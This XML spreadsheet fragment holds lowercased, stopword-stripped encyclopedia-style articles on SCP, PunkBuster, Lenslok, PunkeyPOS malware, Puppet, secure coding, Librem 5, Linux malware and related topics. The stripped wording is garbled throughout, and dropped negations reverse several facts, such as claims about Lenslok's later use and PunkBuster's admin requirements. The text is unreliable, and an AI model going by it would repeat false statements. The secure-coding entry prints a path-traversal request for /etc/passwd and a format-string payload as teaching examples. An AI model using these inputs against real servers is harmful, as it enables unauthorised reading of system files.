(opengrok) libressl portable github</t>
  </si>
  <si>
    <t>Secure copy protocol</t>
  </si>
  <si>
    <t>secure copy protocol (scp) means securely transferring computer files local host remote host remote hosts. based secure shell (ssh) protocol. "scp" commonly refers secure copy protocol program itself.according openssh developers april 2019, outdated, inflexible readily fixed; recommend modern protocols like sftp rsync file transfer. openssh version 9.0, client therefore uses sftp file transfers default instead legacy scp/rcp protocol. secure copy protocol network protocol, based protocol, supports file transfers hosts network. uses secure shell (ssh) data transfer uses mechanisms authentication, thereby ensuring authenticity confidentiality data transit. client send (upload) files server, optionally including basic attributes (permissions, timestamps). clients also request files directories server (download). runs port default. like rcp, defines specifics protocol. function normally, client initiates connection remote host, requests process started remote server. remote process operate modes: source mode, reads files (usually disk) sends back client, sink mode, accepts files sent client writes (usually disk) remote host.for clients, source mode generally triggered flag (from), sink mode triggered (to). these flags used internally documented outside source code. remote remote mode past, remote-to-remote secure copy, client opens connection source host requests turn, open connection destination. (remote-to-remote mode support opening connections using originating client intermediary). important note cannot used remotely copy source destination operating password keyboard-interactive authentication mode, would reveal destination server's authentication credentials source. however, possible key-based gssapi methods require user input.recently, remote-to-remote mode supports routing traffic client originated transfer, even though party transfer. this way, authorization credentials must reside originating client, party. issues using talkative shell profiles expect text communicating login shell. text transmitted profile (e.g. echo "welcome" .bashrc file) interpreted error message, null line (echo causes client deadlock waiting error message complete. secure copy (remote file copy program) program software tool implementing protocol service daemon client. program perform secure copying. perhaps widely used program openssh command line program, provided implementations. program secure analog command. program must part servers want provide service, functions server too. some implementations provide scp2 program, uses sftp protocol instead scp, provides command line interface scp. typically symbolic link scp2. syntax typically, syntax program like syntax (copy): copying local file remote host: localsourcefile user@remotehost:directory/targetfile copying file remote host copying folder remote host (with switch): user@remotehost:directory/sourcefile localtargetfile user@host:directory/sourcefolder localtargetfolder note remote host uses port default specified command. example, copying file host: 2222 user@host:directory/sourcefile targetfile other clients secure copy protocol implements file transfers only, clients rare, implementing requires additional functionality (directory listing least). example, winscp defaults sftp protocol. even operating mode, clients like winscp typically pure clients, must means implement additional functionality (like command). this turn brings platform-dependency problems. more comprehensive tools managing files sftp clients. security 2019 vulnerability cve-2019-6111 announced related openssh tool protocol allowing users overwrite arbitrary files client target directory. also references</t>
  </si>
  <si>
    <t>Performance per watt</t>
  </si>
  <si>
    <t>computing, performance watt measure energy efficiency particular computer architecture computer hardware. literally, measures rate computation delivered computer every watt power consumed. this rate typically measured performance linpack benchmark trying compare computing systems: example using green500 list supercomputers. performance watt suggested sustainable measure computing moore’s law.system designers building parallel computers, google's hardware, pick cpus based performance watt power, cost powering outweighs cost itself.spaceflight computers hard limits maximum power available also hard requirements minimum real-time performance. ratio processing speed required electrical power useful processing speed. definition performance power consumption metrics used depend definition; reasonable measures performance flops, mips, score performance benchmark. several measures power usage employed, depending purposes metric; example, metric might consider electrical power delivered machine directly, another might include power necessary computer, cooling monitoring systems. power measurement often average power used running benchmark, measures power usage employed (e.g. peak power, idle power). example, early univac computer performed approximately 0.015 operations watt-second (performing 1,905 operations second (ops), consuming kw). fujitsu fr-v vliw/vector processor system chip fr550 core variant released 2005 performs giga-ops watts power consumption resulting billion operations watt-second. this improvement trillion times years. most power computer uses converted heat, system takes fewer watts require less cooling maintain given operating temperature. reduced cooling demands makes easier quiet computer. lower energy consumption also make less costly run, reduce environmental impact powering computer (see green computing). installed limited climate control, lower power computer operate lower temperature, make reliable. climate controlled environment, reductions direct power also create savings climate control energy. computing energy consumption sometimes also measured reporting energy required particular benchmark, instance eembc energybench. energy consumption figures standard workload make easier judge effect improvement energy efficiency. performance operations/second) watt also written operations/watt-second, operations/joule, since watt joule/second. flops watt flops watt common measure. like flops (floating point operations second) metric based metric usually applied scientific computing simulations involving many floating point calculations. examples june 2016, green500 list rates efficient supercomputers highest based manycore accelerator pezy-scnp japanese technology addition intel xeon processors riken, 6673.8 mflops/watt; third ranked chinese-technology sunway taihulight much bigger machine, ranked top500, others list) 6051.3 mflops/watt.in june 2012, green500 list rated bluegene/q, power efficient supercomputer top500 terms flops watt, running 2,100.88 mflops/watt.in november 2010, machine, blue gene/q achieves 1,684 mflops/watt.on june 2008, reported ibm's roadrunner supercomputer achieves mflops/watt.as part intel's tera-scale research project, team produced 80-core achieve 16,000 mflops/watt. future certain. microwulf, cost desktop beowulf cluster four dual-core athlon 3800+ computers, runs mflops/watt.kalray developed 256-core vliw achieves 25,000 mflops/watt. next generation expected achieve 75,000 mflops/watt. however, 2019 latest chip embedded 80-core claims tflops w.adapteva announced epiphany 1024-core 64-bit risc processor intended achieve gflops/watt, later announced epiphany "unlikely" become available commercial product patent 10,020,436, july 2018 claims three intervals 100, 300, gflops/watt. efficiency graphics processing units (gpu) continued increase energy usage, cpus designers recently focused improving performance watt. high performance gpus draw large amount power, therefore intelligent techniques required manage power consumption. measures like 3dmark2006 score watt help identify efficient gpus. however adequately incorporate efficiency typical use, much time spent less demanding tasks.with modern gpus, energy usage important constraint maximum computational capabilities achieved. designs usually highly scalable, allowing manufacturer multiple chips video card, multiple video cards work parallel. peak performance system essentially limited amount power draw amount heat dissipate. consequently, performance watt design translates directly peak performance system uses design. since gpus also used general purpose computation, sometimes performance measured terms also applied cpus, flops watt. challenges while performance watt useful, absolute power requirements also important. claims improved performance watt used mask increasing power demands. instance, though newer generation architectures provide better performance watt, continued performance increases negate gains efficiency, gpus continue consume large amounts power.benchmarks measure power heavy load adequately reflect typical efficiency. instance, 3dmark stresses performance gpu, many computers spend time less intense display tasks (idle, tasks, displaying video). idle efficiency graphics system least significant overall energy efficiency. likewise, systems spend much time standby soft adequately characterized efficiency load. help address benchmarks, like specpower, include measurements series load levels.the efficiency electrical components, voltage regulators, decreases increasing temperature, power used increase temperature. power supplies, motherboards, video cards subsystems affected this. power draw depend temperature, temperature temperature dependence noted measuring.performance watt also typically include full life-cycle costs. since computer manufacturing energy intensive, computers often relatively short lifespan, energy materials involved production, distribution, disposal recycling often make significant portions cost, energy use, environmental impact.energy required climate control computer's surroundings often counted wattage calculation, significant. other energy efficiency measures swap (space, wattage performance) microsystems metric data centers, incorporating power space: {\displaystyle \mathrm {swap} ={\frac {\mathrm {performance} }{\mathrm {space} \cdot \mathrm {power} where performance measured appropriate benchmark, space size computer.reduction power, mass, volume also important spaceflight computers. also energy efficiency benchmarksaverage power (acp) measure power consumption running several standard benchmarks eembc energybench specpower benchmark servers running java (server side java operations joule)otherdata center infrastructure efficiency (dcie) energy proportional computing geforce series list, energy theoretical flops energy management koomey's landauer's principle low-power electronics power usage effectiveness (pue) processor power dissipation notes references further reading wu-chun feng (october 2003). "making case efficient supercomputing". queue. (7). kirk cameron (november 2013). "hpc power efficiency green500". wire. (11). wu-chun feng kirk cameron (december 2007). "the green500 list: encouraging sustainable supercomputing". ieee computer. (12). external links green500</t>
  </si>
  <si>
    <t>PunkBuster</t>
  </si>
  <si>
    <t>punkbuster computer program designed detect software used cheating online games. scanning memory contents local machine. computer identified using cheats banned connecting protected servers. program isolate cheaters prevent disrupting legitimate games. punkbuster developed published even balance, inc. history tony founded even balance develop punkbuster experience cheaters team fortress classic.the first beta punkbuster announced september 2000, half-life. valve time fighting hard battle cheating, going since release game. first game punkbuster integrated software's return castle wolfenstein. features published features real-time scanning memory, placing punkbuster client players' computers searching known hacks/cheats using built-in database. throttled two-tiered background auto-update system using multiple internet master servers provide end-user security ensuring false corrupted updates installed players' computers. frequent status reports sent punkbuster server players. when necessary, punkbuster server raises violation (depending upon settings) cause offending player removed game players informed violation. punkbuster admins also manually remove players game specified number minutes permanently desired. punkbuster servers optionally configured randomly check player settings looking known exploits game engine. punkbuster servers configured instruct clients calculate partial hashes files inside game installation directory. results compared configuration differences logged, optionally, client removed server. punkbuster admins request actual screenshot samples specific players and/or configure server randomly grab screenshot samples players gameplay. however, possible game hack block screenshots (producing cropped screenshot) remove visual features hack (cleaning screenshot) remain undetected, leaving effectiveness feature diminished. optional "bad name" facility provided punkbuster admins prevent players using offensive player names containing unwanted profanity slurs. search functions provided punkbuster admins wish search player's keybindings scripts anything known exploit game. punkbuster player power facility configured allow players self-administer game servers server administrator present entirely without need passwords, players call votes player removed server certain amount time. punkbuster servers optional built-in mini http server interface allows game server remotely administered browser anywhere internet. punkbuster admins stream server logs real time another location. punkbuster initiated punkbuster hardware bans, bans hardware components upon detection cheats disrupt circumvent punkbuster's normal operation. these bans mean permanently banning players whose matches blacklist evenbalance. incompatibilities some games (like crysis bioshock 64-bit version punkbuster. reason, clients able play punkbuster enabled servers unless 32-bit client game. punkbuster allow windows users without administrative accounts connect games. upon connecting game, user immediately kicked insufficient privileges. starting client v1.700, windows service full administrative rights used complement ingame punkbuster client, allowing updates without user rights elevation. however, games might still require administrative rights punkbuster function correctly. enforcement global guid bans hardware bans punkbuster uses system called 'global banning'. either guid (generated key) parts computer's hardware banned punkbuster-enabled servers. most attempts cheating receive detection warning, cheats interfere punkbuster's software could lock guid offending system disable access punkbuster enabled servers particular game. particularly severe instances cheating lock offending computer punkbuster-protected games.as june 2004, even balance used unique hardware identifiers permanently players attempt interfere punkbuster's normal operation (which itself, violation punkbuster eula). even balance uses 128-bit private one-way hash serial number information individual computers obtained hardware guid.as previous punkbuster guid bans, hardware guid lockouts permanent. even balance disclosed hardware punkbuster looks issuing ban, close examination software indicated guid based serial numbers scanned hard-drives. many bans based information user's system, hardware guid bans spoofed. false positives during period october november 2013, punkbuster falsely banning battlefield users error "(gamehack #89265)" november 2013 issue resolved even balance inc. punkbuster bans resulting error resolved officially deemed false-positive. confirmed violation #89265 triggered non-cheat software. this violation code removed master servers encourage server admins give benefit doubt players raised code past days." attacks punkbuster punkbuster usually searches known cheat program signatures opposed relying heuristic approach. march 2008, hackers published implemented proof concept exploit punkbuster's indiscriminate memory scanning. because punkbuster scans machine's virtual memory, malicious users able cause mass false positives transmitting text fragments known cheat programs onto high population channel. when punkbuster detected text within user's client text buffers, users banned. march 2008, even balance confirmed existence exploit. games using punkbuster also cheating online games gameguard (nprotect) valve anti-cheat warden references external links official website</t>
  </si>
  <si>
    <t>Secure by default</t>
  </si>
  <si>
    <t>security default, software, means default configuration settings secure settings possible, necessarily user-friendly settings. many cases, security user-friendliness evaluated based risk analysis usability tests. this leads discussion secure settings are. result, precise meaning "secure default" remains undefined. network operating system, typically means first foremost listening inet(6) domain sockets installation; open network ports. this checked local machine tool like netstat remotely port scanner nmap. general rule, secure network secure least secure node entire network. program uses secure configuration settings default, user better protected. however, users consider security obstructed secure settings. common example whether blank passwords allowed login. everyone can, willing type memorize password.another secure program system abstraction, user presented interface user cannot discouraged cause (accidental) data loss. this, however, lead less functionality reduced flexibility. having user control preferences typically cause cost larger part user interface configuration controls. some servers devices authentication system, default usernames passwords. properly changed, anyone knows default configuration successfully authenticate. non-unique defaults, practice would violate principle 'security default'. operating systems openbsd claims operating system fully secure default. this, however, mean inherently secure operating system. this depends definition operating system. there many operating systems capable networking systems, considering amount network-based security compromises today, argue operating system secure. openbsd network operating system. ubuntu linux distribution aimed desktop users hides administrative account default allows first user gain administrative privileges certain system tasks (such installing system updates, managing disk drives). macos hide account, users limited rights still fully utilise system.microsoft windows linspire criticised allowing user administrative privileges without warning—a potential threat system. windows vista subsequent versions windows attempt remedy situation user account control system. also security-focused operating system usability default (computer science) secure design authentication</t>
  </si>
  <si>
    <t>Secure attention key</t>
  </si>
  <si>
    <t>secure attention (sak) secure attention sequence (sas) special combination pressed computer keyboard login screen must, user, completely trustworthy. operating system kernel, interacts directly hardware, able detect whether secure attention pressed. when event detected, kernel starts trusted login processing. secure attention designed make login spoofing impossible, kernel suspend program, including masquerading computer's login process, starting trustable login operation. examples some examples are: ctrl+alt+delete windows alt+sysrq+k default sequence linux. true c2-compliant sak. also control-alt-del magic sysrq break references</t>
  </si>
  <si>
    <t>Lenslok</t>
  </si>
  <si>
    <t>lenslok copy protection mechanism found computer games software 8-bit atari computers, commodore sinclair spectrum, sinclair amstrad cpc. well-known game elite spectrum. overview lenslok released 1985 plastic lens foldaway frame. lenslok device essentially prisms arranged vertically plastic holder. before game started, two-letter code displayed screen, corrupted split vertical bands rearranged screen. viewing bands lenslok restored correct order code could read entered allowing access game. device small enough folded flat next audio cassette standard case. order lenslok work correctly displayed image correct size. this meant software needed calibrated take account size display. users found setup particularly annoying, least part found instructions initially shipped unclear. additionally, device could calibrated large small televisions, games shipped mismatched lensloks prevented code correctly descrambled. lenslok system used later releases elite. lenslok copy protection system commodore version elite easy bypass existed letters always first combination generated lenslok. simple crack, letters input copy protection check adding lines machine language code, effective defeating lenslok. usage issues whitehead eurogamer explains lenslok difficult operate difficult instructions, requiring recalibrations, sometimes work all, including screen sizes large small. whitehead notes "problems lenslok undoubtedly exaggerated". pavel barter gamesradar similarly notes lenslok work screens. end, lenslok used releases. software software used lenslok system: ace, released cascade games elite, released firebird advanced music system, released firebird fighter pilot, released digital integration graphic adventure creator, released incentive software jewels darkness, released level computing studio, released rainbird price magik, released level computing silicon dreams, released level computing supercharge, released digital precision tomahawk, released digital integration racer, released digital integration also product references lenslok instruction sheet (pdf file) bird sanctuary lenslok article containing details lenslok, photographs. lenskey lenslok emulator allowing access emulated versions games. crash loked out? sinclair user letters: lenslocked</t>
  </si>
  <si>
    <t>PunkeyPOS Malware</t>
  </si>
  <si>
    <t>punkeypos type point sale malware recently discovered pandalabs. this point sale malware infects point sale(pos) systems types malware applications keylogger scraper. punkeypos gets installed computer automatically without knowledge user, similar manner malware. process punkey malware keylogger captures records keystrokes made terminals retail stores. captures data related credit cards. scraper reads memory system processes terminals. information magnetic strips cards gets stored terminal/ device memory stolen information encrypted forwarded cybercriminal's control command server (c&amp;c). data breach report reported pandalabs retail stores systems infected variant punkeypos malware. also point-of-sale malware cyber security standards list cyber attack threat trends references</t>
  </si>
  <si>
    <t>Puppet (software)</t>
  </si>
  <si>
    <t>computing, puppet software configuration management tool includes declarative language describe system configuration. model-driven solution requires limited programming knowledge use.puppet produced puppet, inc, founded luke kanies 2005. primary product, puppet enterprise, proprietary closed-source version open-source puppet software. they puppet's declarative language manage stages infrastructure lifecycle, including provisioning, patching, configuration, management operating system application components data centers cloud infrastructures.puppet uses open-core model; free-software version released version general public license (gpl) version 2.7.0, later releases apache license, puppet enterprise uses proprietary license. puppet puppet enterprise operate multiple unix-like systems (including linux, solaris, bsd, aix, hp-ux) microsoft windows support. puppet written ruby, facter written c++, puppet server puppet written clojure. design puppet designed manage configuration unix-like microsoft windows systems declaratively. user describes system resources state, either using puppet's declarative language ruby (domain-specific language). this information stored files called "puppet manifests". puppet discovers system information utility called facter, compiles puppet manifests system-specific catalog containing resources resource dependency, applied target systems. actions taken puppet reported. puppet consists custom declarative language describe system configuration, either applied directly system, compiled catalog distributed target system client–server paradigm (using rest api), agent uses system specific providers enforce resource specified manifests. resource abstraction layer enables administrators describe configuration high-level terms, users, services packages without need specify specific commands (such rpm, yum, apt). puppet model-driven, requiring limited programming knowledge use.it comes versions, puppet enterprise open source puppet. addition providing functionalities open source puppet, puppet enterprise also provides gui, command line tools node management. architecture puppet usually follows client-server architecture. client known agent server known master. testing simple configuration, also used stand-alone application command line. puppet server installed servers, puppet agent installed machines managed. puppet agents communicate server fetch configuration instructions. agent applies configuration system sends status report server. devices puppet agent daemon, triggered periodically cron manually whenever needed. puppet programming language declarative language describes state computer system terms "resources", represent underlying network operating system constructs. user assembles resources manifests describe desired state system. these manifests stored server compiled configuration instructions agents request. puppet resource syntax: example resource representing unix user: puppet allows users configure systems platform-agnostic representing operating system concepts structured data. rather specifying exact commands perform system action, user creates resource, puppet translates system-specific instructions sent machine configured. example, user wants install package three different nodes, runs different operating system, declare resource, puppet determine commands need based data obtained facter, program collects data system running including operating system, address, hardware information. providers node facter facts system details translate resource types catalog machine instructions actually configure node. normal puppet following stages: agent sends facts facter master. puppet builds graph list resources inter-dependencies, representing order need configured, every client. master sends appropriate catalog agent node. actual state system configured according desired state described manifest file. system already desired state, puppet make changes, making transactions idempotent. finally, agent sends report master, detailing changes made errors occurred. vendor puppet's vendor puppet, inc, privately held information technology (it) automation software company based portland, oregon, usa. 2005, puppet founded former luke kanies. jan. 2019 yvonne wassenaar replaced sanjay mirchandani ceo. wassenaar previously worked airware, relic vmware. february 2011 puppet released first commercial product, puppet enterprise, built open-source base, extra commercial components. september 2011, company released puppet enterprise 2.0, introduced integration mcollective, acquired puppet 2010, well provisioning virtual machines amazon vmware. june 2013, puppet released puppet enterprise 3.0, features rewritten orchestration engine.puppet purchased infrastructure automation firm distelli september 2017. puppet rebranded distelli's dashboard continuous integration continuous delivery product) puppet pipelines applications, dashboard puppet pipelines containers. products made generally available october, 2017.in 2018, puppet released puppet discovery, tool discover manipulate resources hybrid networks. puppet's third stand-alone enterprise product. june 2018 puppet raised million total $150 million funding. round cisco included kleiner perkins, true ventures, edbi, vmware.puppet partners technology integrations vmware, amazon services, cisco, openstack, microsoft azure, eucalyptus, rightscale, zenoss.in april 2022, announced puppet acquired minneapolis-headquartered software developer, perforce. company subsequently laid puppet's workforce portland. also comparison open-source configuration management software cfengine references external links official website puppetlabs github official puppet labs youtube channel pulling strings puppet: configuration management made easy (isbn 978-1-59059-978-5) puppet (isbn 978-1-4302-3057-1) learning puppet (isbn 978-1-4919-0766-5)</t>
  </si>
  <si>
    <t>Secure coding</t>
  </si>
  <si>
    <t>secure coding practice developing computer software guards accidental introduction security vulnerabilities. defects, bugs logic flaws consistently primary cause commonly exploited software vulnerabilities. through analysis thousands reported vulnerabilities, security professionals discovered vulnerabilities stem relatively small number common software programming errors. identifying insecure coding practices lead errors educating developers secure alternatives, organizations take proactive steps help significantly reduce eliminate vulnerabilities software deployment. buffer-overflow prevention buffer overflows, common software security vulnerability, happen process tries store data beyond fixed-length buffer. example, slots store items problem attempt store items. computer memory overflowed data overwrite data next location result security vulnerability (stack smashing) program termination (segmentation fault). example program prone buffer overflow isif user input larger destination buffer, buffer overflow occur. unsafe program, strncpy prevent possible buffer overflow.another secure alternative dynamically allocate memory heap using malloc.in code snippet, program attempts copy contents dst, also checking return value malloc ensure enough memory able allocated destination buffer. format-string attack prevention format string attack malicious user supplies specific inputs eventually entered argument function performs formatting, printf(). attack involves adversary reading writing stack. printf function writes output stdout. parameter printf function properly formatted, several security bugs introduced. below program vulnerable format string attack.a malicious argument passed program could “%s%s%s%s%s%s%s”, crash program improper memory reads. integer-overflow prevention integer overflow occurs arithmetic operation results integer large represented within available space. program properly check integer overflow introduces potential software bugs exploits. below function attempts confirm less equal defined value max: problem code check integer overflow addition operation. greater maximum possible value unsigned int, addition operation overflow perhaps result value less equal max, even though greater max. below function checks overflow confirming greater equal overflow, would less less path traversal prevention path traversal vulnerability whereby paths provided untrusted source interpreted unauthorised file access possible. example, consider script fetches article taking filename, read script parsed. such script might following hypothetical retrieve article food: https://www.example.net/cgi-bin/article.sh?name=dogfood.html script input checking, instead trusting filename always valid, malicious user could forge retrieve configuration files server: https://www.example.net/cgi-bin/article.sh?name=../../../../../etc/passwd depending script, expose /etc/passwd file, unix-like systems contains (among others) user ids, login names, home directory paths shells. (see injection similar attack.) also defensive programming security notes references taylor, art; brian buege; randy layman (2006). hacking exposed j2ee java. mcgraw-hill primis. 426. isbn 0-390-59975-1.</t>
  </si>
  <si>
    <t>Librem 5</t>
  </si>
  <si>
    <t>librem smartphone manufactured purism part librem line products. phone designed goal using free software whenever possible, includes pureos, linux operating system, default, 2021 smartphone recommended free software foundation. like librem products, librem focuses privacy freedom, includes features like hardware kill switches, easily-replaceable components. name, numerical "5", refers screen size, release version. after announcement august 2017, distribution developer kits limited pre-release models occurred throughout 2019 2020. first mass-production version librem shipped november 2020. history august 2017, purism started crowdfunding campaign librem smartphone aimed purely free software provided pureos, "[focus] security design privacy protection default". purism claimed phone would become "the world's first ever ip-native mobile handset, using end-to-end encrypted decentralized communication". purism cooperated gnome development librem software. planned, ubuntu touch also offered optional interfaces.the release librem delayed several times. originally planned launch january 2019. purism announced september 2018, launch date would postponed april 2019, power management bugs silicon europe/north america holiday season. development kits software developers, shipped december 2018, unaffected bugs, since developers normally connect device power outlet, rather rely phone battery. february, launch date postponed third quarter 2019, necessity tests.specifications pre-orders, $649, increase $699, announced july 2019. september 2019, purism announced shipping scheduled occur later month, would done "iterative" process. iterative release plan included announcement different "batches" librem releases, first four would limited pre-production models. each consecutive batch, consisted different arboreal-themed code names release dates, would feature hardware, mechanical, software improvements. purism contacted customer pre-ordered allow choose batch they'd prefer receive. pre-mass production batches, order release, included code names "aspen", "birch", "chestnut", "dogwood". fifth batch, "evergreen", would official mass-production model, sixth batch, "fir", would second mass-production model. september 2019, purism announced first batch limited-production librem phones (aspen) started shipping. video early phone produced, shipping status update released soon after. however, later reported, aspen batch shipped employees developers. november 2019, reported, second batch (birch) would consist around phones, would hands backers first week december. december 2019, salter technica reported "prototype" devices received; however, really "phone" yet. there audio attempting place phone call, cameras work yet. reports third batch limited pre-mass-production models (chestnut) received customers reviewers occurred january 2020. chestnut librem models first ability make calls send text messages. 2020, techradar reported call quality fine, though speaker mode quiet", volume adjustment work. according techradar, 5-hour battery time inability phone charge turned stark reminder librem beta status".on november 2020, purism announced press release begun shipping finished version librem known "evergreen". following release, december 2019, purism announced offer "librem usa" version phone price $1999, assembled united states extra supply chain security. according purism todd weaver, "having secure auditable based supply chain including parts procurement, fabrication, testing, assembly, fulfillment within facility best possible security story." hardware librem features i.mx quad core processor, integrated supports opengl 3.0, opengl 3.1, vulkan opencl default drivers; however, since driver used open source etnaviv driver, currently supports opengl opengl 2.0. ram, 32gb emmc storage, 13mp rear camera, front camera. left side phone features three hardware kill switches, power camera microphone, wi-fi bluetooth modem, baseband modem.) device uses usb-c connector charge 4500 lithium battery. (5.7") display resolution 1440×720 pixels. also trrs headphone/mic jack, single slot, microsd card slot. mobile security hardware features three hardware kill switches physically power cameras microphone, wi-fi bluetooth, baseband processor, respectively. further precautionary measures used lockdown mode, which, addition powering cameras, microphone, wifi, bluetooth cellular baseband, also cuts power gnss, imu, ambient light proximity sensor. this possible fact, components integrated system chip (soc), like conventional smartphones. instead, cellular baseband wi-fi/bluetooth components located replaceable cards, means, changed support different wireless standards. kill switch circuit microphone prevent audio jack used acoustic cryptanalysis.in place integrated mobile found smartphones, librem uses separate chips: i.mx quad, silicon labs rs9116, broadmobi bm818 gemalto pls8, stmicroelectronics teseo-liv3f, wolfson microelectronics wm8962, texas instruments bq25895.the downside dedicated chips instead integrated system-on-chip takes energy operate separate chips, phone's circuit boards much larger. hand, using separate components means longer support manufacturers mobile socs, short support timelines. according purism, librem designed avoid planned obsolescence, receive lifetime software updates.the librem first phone contain smartcard reader, openpgp card inserted secure cryptographic operations. purism plans openpgp cards implement storage keys, disk unlocking, secure authentication, local password vault, protection sensitive files, user personas, travel personas.to promote better security, source code root file system free/open source software reviewed user. purism publishes schematics librem printed circuit boards (pcbs) 3.0+ license, publishes x-rays phone, user verify changes hardware, inserted chips. software librem ships purism's pureos, debian gnu/linux derivative. operating system uses mobile user interface developed purism called phosh, portmanteau "phone shell". based wayland, wlroots, gnome. unlike mobile linux interfaces, ubuntu touch plasma mobile, phosh based tight integration desktop linux software stack, purism developers believe make easier maintain long-term incorporate existing desktop linux distributions. phosh packaged number desktop distros (debian, arch, manjaro, fedora opensuse) used eight sixteen linux ports pinephone.the phone convergence device: connected keyboard, monitor, mouse, linux applications desktop computer would. many desktop linux applications phone well, albeit possibly without touch-friendly purism taking unique approach convergence downsizing existing desktop software reuse mobile environment. purism developed libhandy library make software adaptive interface elements adjust smaller mobile screens. contrast, companies microsoft samsung ubuntu (and canonical unity8) tried achieve convergence separate sets software mobile desktop environments. most apps, android apps plasma mobile's kirigami implement convergence upsizing existing mobile apps desktop interface.purism claims "librem first ever matrix-powered smartphone, natively using end-to-end encrypted decentralised communication dialer messaging app".purism unable find free/open-source cellular modem, phone uses modem proprietary hardware, isolates rest components rather integrated system chip (soc). this prevents code modem able read modify data going soc. also comparison open-source mobile phones list open-source mobile phones microphone blocker modular smartphone pinephone references external links librem</t>
  </si>
  <si>
    <t>Libvirt</t>
  </si>
  <si>
    <t>libvirt open-source api, daemon management tool managing platform virtualization. used manage kvm, xen, vmware esxi, qemu virtualization technologies. these apis widely used orchestration layer hypervisors development cloud-based solution. internals libvirt library bindings languages, notably python, perl, ocaml, ruby, java, javascript (via node.js) php. libvirt programming languages composed wrappers around another class/package called libvirtmod. libvirtmod's implementation closely associated counterpart c/c++ syntax functionality. supported hypervisors lightweight linux container system openvz lightweight linux container system kernel-based virtual machine/qemu (kvm) open-source hypervisor linux smartos bare-metal hypervisor user-mode linux (uml) paravirtualized kernel virtualbox hypervisor oracle (formerly sun) windows, linux, macos, solaris vmware esxi hypervisors intel hardware vmware workstation player hypervisors windows linux hyper-v hypervisor windows microsoft powervm hypervisor aix, linux bhyve hypervisor freebsd (support added libvirt 1.2.2) user interfaces various virtualization programs platforms libvirt. virtual machine manager, gnome boxes others provide graphical interfaces. popular command line interface virsh, higher level tools ovirt. corporate development libvirt backed hat, significant contributions organisations individuals. libvirt available linux distributions; remote servers also accessible apple microsoft windows clients. also spice libguestfs linux range virtualizing references books warnke, robert; ritzau, thomas. qemu-kvm libvirt german). norderstedt, germany: books demand. isbn 978-3-8370-0876-0. external links official website mailing lists</t>
  </si>
  <si>
    <t>PeerBlock</t>
  </si>
  <si>
    <t>peerblock free open-source personal firewall blocks packets coming from, going maintained list black listed hosts. peerblock windows successor software peerguardian (which currently maintained linux). blocks incoming outgoing connections addresses included blacklists (made available internet), addresses specified user. peerblock mainly uses blacklists provided iblocklist.com. development peerblock based code peerguardian test3 vista version. adds support 64-bit windows vista, windows windows when peerguardian project ended, developer phoenix labs encouraged current peerguardian users migrate peerblock.peerblock development small team developers mark bulas. hosting, well signed driver, funded donations public. future donations intended contribute future signed drivers, hosting possibly rent virtual private server team able build "real" online-update feature future releases peerblock. features peerblock added multiple features latest version program. such constantly updating blocklist managed home site manager lets choose lists include block. program allows user turn http trackers well including showing time, source, address, destination, protocol tracker. list settings allows users customize program's interface well operations.until september 2013, i-blocklist, supplier blocking lists peerblock uses, supported unlimited free list updating. since september 2013 updates limited weekly, except paid subscribers. peerblock hard-coded i-blocklist lists entered revenue-sharing agreement i-blocklist. late 2015 blocklists longer available without payment subscription. references external links official website</t>
  </si>
  <si>
    <t>Linux malware</t>
  </si>
  <si>
    <t>linux malware includes viruses, trojans, worms types malware affect linux family operating systems. linux, unix unix-like computer operating systems generally regarded well-protected against, immune computer viruses. linux vulnerability like unix systems, linux implements multi-user environment users granted specific privileges form access control implemented. gain control linux system cause serious consequences system itself, malware would gain root access system.in past, suggested linux little malware market share made less profitable target. rick moen, experienced linux system administrator, counters that: [that argument] ignores unix's dominance number non-desktop specialties, including servers scientific workstations. virus/trojan/worm author successfully targeted specifically apache httpd linux/x86 servers would extremely target-rich environment instantly earn lasting fame, happen. 2008 quantity malware targeting linux noted increasing. shane coursen, senior technical consultant kaspersky lab, said time, "the growth linux malware simply increasing popularity, particularly desktop operating system operating system directly correlated interest malware writers develop malware os."tom ferris, researcher security protocols, commented kaspersky's reports, stating, people's minds, non-windows, secure, that's case. they think nobody writes malware linux that's necessarily true."some linux users linux-based anti-virus software scan insecure documents email comes going windows users. securityfocus's scott granneman stated: ...some linux machines definitely need anti-virus software. samba servers, instance, store documents undocumented, vulnerable microsoft formats, word excel, contain propagate viruses. linux mail servers software order neutralize viruses show mailboxes outlook outlook express users. because predominantly used mail servers send mail computers running operating systems, linux virus scanners generally definitions for, scan for, known viruses computer platforms. example, open source clamav "detects viruses, worms trojans, including microsoft office macro viruses, mobile malware, threats." viruses trojan horses viruses listed pose potential, although minimal, threat linux systems. infected binary containing viruses run, system would temporarily infected, linux kernel memory resident read-only. infection level would depend user privileges binary. binary root account would able infect entire system. privilege escalation vulnerabilities permit malware running limited account infect entire system. worth noting true malicious program without special steps taken limit privileges. trivial code snippet program user download additional code download modified login server, open mail relay, similar program, make additional component time user logs special malware writing skills needed this. special skill needed tricking user (trojan) program first place. software repositories significantly reduces threat installation malware, software repositories checked maintainers, ensure repository malware-free. subsequently, ensure safe distribution software, checksums made available. these make possible reveal modified versions introduced e.g. hijacking communications using man-in-the-middle attack redirection attack poisoning. careful digital signatures provides additional line defense, limits scope attacks include original authors, package release maintainers possibly others suitable administrative access, depending keys checksums handled. reproducible builds ensure digitally signed source code reliably transformed binary application. worms targeted attacks classical threat unix-like systems vulnerabilities network daemons, servers. these used worms attacks specific targets. servers patched quite quickly vulnerability found, widespread worms kind. specific targets attacked vulnerability publicly known guarantee certain installation secure. also servers without vulnerabilities successfully attacked weak passwords. scripts linux servers also used malware without attack system itself, e.g. content scripts insufficiently restricted checked used malware attack visitors. some attacks complicated malware attack linux servers, full root access hackers able attack modifying anything like replacing binaries injecting modules. this allow redirection users different content web. typically, script meant leaving comments, could, mistake, allow inclusion code exploiting vulnerabilities browser. buffer overruns older linux distributions relatively sensitive buffer overflow attacks: program care size buffer itself, kernel provided limited protection, allowing attacker execute arbitrary code rights vulnerable application attack. programs gain root access even launched non-root user (via setuid bit) particularly attractive attack. however, 2009 kernels include address space layout randomization (aslr), enhanced memory protection extensions making attacks much difficult arrange. cross-platform viruses area concern identified 2007 cross-platform viruses, driven popularity cross-platform applications. this brought forefront malware awareness distribution openoffice.org virus called badbunny. stuart smith symantec wrote following: what makes virus worth mentioning illustrates easily scripting platforms, extensibility, plug-ins, activex, etc, abused. often, forgotten pursuit match features another vendor... ability malware survive cross-platform, cross-application environment particular relevance malware pushed sites. long someone uses something like drop javascript infecter server, regardless platform? social engineering case operating system, linux vulnerable malware tricks user installing social engineering. december 2009 malicious waterfall screensaver contained script used infected linux denial-of-service attacks discovered. go-written malware security report: 